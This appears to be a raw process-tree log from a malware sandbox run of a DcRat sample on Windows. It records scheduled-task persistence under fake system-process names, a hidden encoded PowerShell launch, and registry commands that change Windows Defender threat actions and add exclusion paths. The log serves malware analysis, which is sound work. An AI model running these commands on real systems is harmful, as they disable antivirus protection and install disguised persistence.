                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2636 -ip 2636
                                                                            1⤵
                                                                              PID:4432
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1756 -ip 1756
                                                                              1⤵
                                                                                PID:3572
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2772 -ip 2772
                                                                                1⤵
                                                                                  PID:776
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3880 -ip 3880
                                                                                  1⤵
                                                                                    PID:1828
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2772 -ip 2772
                                                                                    1⤵
                                                                                      PID:3832
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2772 -ip 2772
                                                                                      1⤵
                                                                                        PID:4732
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2772 -ip 2772
                                                                                        1⤵
                                                                                          PID:3572
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2772 -ip 2772
                                                                                          1⤵
                                                                                            PID:4360
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2772 -ip 2772
                                                                                            1⤵
                                                                                              PID:4196
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              schtasks.exe /create /tn "TrustedInstaller" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\TrustedInstaller.exe'" /rl HIGHEST /f
                                                                                              1⤵
                                                                                              • DcRat
                                                                                              • Process spawned unexpected child process
                                                                                              • Creates scheduled task(s)
                                                                                              PID:1548
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\en-US\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                              1⤵
                                                                                              • DcRat
                                                                                              • Process spawned unexpected child process
                                                                                              • Creates scheduled task(s)
                                                                                              PID:2864
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\perfh011\lsass.exe'" /rl HIGHEST /f
                                                                                              1⤵
                                                                                              • DcRat
                                                                                              • Process spawned unexpected child process
                                                                                              • Executes dropped EXE
                                                                                              • Creates scheduled task(s)
                                                                                              • Modifies registry class
                                                                                              PID:4340
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                              1⤵
                                                                                              • DcRat
                                                                                              • Process spawned unexpected child process
                                                                                              • Creates scheduled task(s)
                                                                                              PID:2104
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              schtasks.exe /create /tn "VFUp4JNN4sWhSY2fyPxCTXlj" /sc ONLOGON /tr "'C:\Users\Admin\Documents\1_r18zjk9LQYSOU2UzHWEnuP\VFUp4JNN4sWhSY2fyPxCTXlj.exe'" /rl HIGHEST /f
                                                                                              1⤵
                                                                                              • DcRat
                                                                                              • Process spawned unexpected child process
                                                                                              • Creates scheduled task(s)
                                                                                              PID:4804
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\resources\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                                                              1⤵
                                                                                              • DcRat
                                                                                              • Process spawned unexpected child process
                                                                                              • Creates scheduled task(s)
                                                                                              PID:4256
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\Web\Screen\cmd.exe'" /rl HIGHEST /f
                                                                                              1⤵
                                                                                              • DcRat
                                                                                              • Process spawned unexpected child process
                                                                                              • Creates scheduled task(s)
                                                                                              PID:4212
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 2772 -ip 2772
                                                                                              1⤵
                                                                                                PID:2956
                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Public\Libraries\dllhost.exe'" /rl HIGHEST /f
                                                                                                1⤵
                                                                                                • DcRat
                                                                                                • Process spawned unexpected child process
                                                                                                • Creates scheduled task(s)
                                                                                                PID:452
                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\p2p-mesh\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                                                1⤵
                                                                                                • DcRat
                                                                                                • Process spawned unexpected child process
                                                                                                • Creates scheduled task(s)
                                                                                                PID:1684
                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\csrss.exe'" /rl HIGHEST /f
                                                                                                1⤵
                                                                                                • DcRat
                                                                                                • Process spawned unexpected child process
                                                                                                • Creates scheduled task(s)
                                                                                                PID:748
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                1⤵
                                                                                                  PID:4640
                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                    2⤵
                                                                                                      PID:4132
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3880 -ip 3880
                                                                                                    1⤵
                                                                                                      PID:3256
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3880 -ip 3880
                                                                                                      1⤵
                                                                                                        PID:1868
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 3880 -ip 3880
                                                                                                        1⤵
                                                                                                          PID:1908
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 3880 -ip 3880
                                                                                                          1⤵
                                                                                                          • DcRat
                                                                                                          • Adds Run key to start application
                                                                                                          • Drops file in System32 directory
                                                                                                          • Drops file in Program Files directory
                                                                                                          • Drops file in Windows directory
                                                                                                          PID:448
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                          1⤵
                                                                                                            PID:3208
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                            1⤵
                                                                                                              PID:4356
                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                              1⤵
                                                                                                                PID:4116
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\gqowqHz.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\gqowqHz.exe j6 /site_id 525403 /S
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Drops file in System32 directory
                                                                                                                PID:4596
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                  2⤵
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:3984
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                    3⤵
                                                                                                                      PID:3468
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                        4⤵
                                                                                                                          PID:2016
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:4792
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:688
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:2804
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:2260
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:1236
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:3948
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:2524
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:2180
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:1944
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:4916
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:2728
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:1368
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:3484
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:3400
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:5096
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4704
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1208
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                          3⤵
                                                                                                                                                            PID:3932
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4892
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                              3⤵
                                                                                                                                                                PID:3312
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3752
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:1336
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:2656
                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                    PID:1732
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:1320
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:3976
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:216
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:4248
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:2792
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:1868
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3196
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:2232
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:4148
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:4840
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:404
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:1476
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:4340
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:1160
